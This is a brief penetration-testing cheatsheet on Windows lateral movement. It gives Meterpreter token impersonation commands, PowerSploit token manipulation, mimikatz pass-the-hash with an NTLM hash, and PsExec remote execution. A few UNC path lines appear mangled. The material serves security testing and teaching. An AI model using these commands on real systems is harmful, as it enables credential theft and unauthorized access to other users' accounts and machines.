title: Lateral Movement date: 2021-01-13 categories: [cheatsheets]
Detailed information:
https://fuzzysecurity.com/tutorials/25.html
Tools:
Grab tokens of other users (using NtQuerySysteminformation vodoo) can impersonate these tokens to do stuff as another user!
-> user must be logged in!
<meterpreter session>
incognito> list_tokens -u
incognito> impersonate_token DOMAIN\username
// or, if it is working, use powersploit:
Invoke-TokenManipulation
Local Pass the Hash:
mimikatz> privilege::debug # check if debug priv is set
mimikatz> sekurlsa::pth /user:<user> /domain:. /ntlm:<hash>
exploit/windows/smb/psexec
cmd> PsExec.exe \10.0.0.100 -u <user> -p <pass> cmd
exploit/windows/smb/psexec
Admin shares are automatically created by windows
contain all partitions as hidden admin share
C:\ = \ip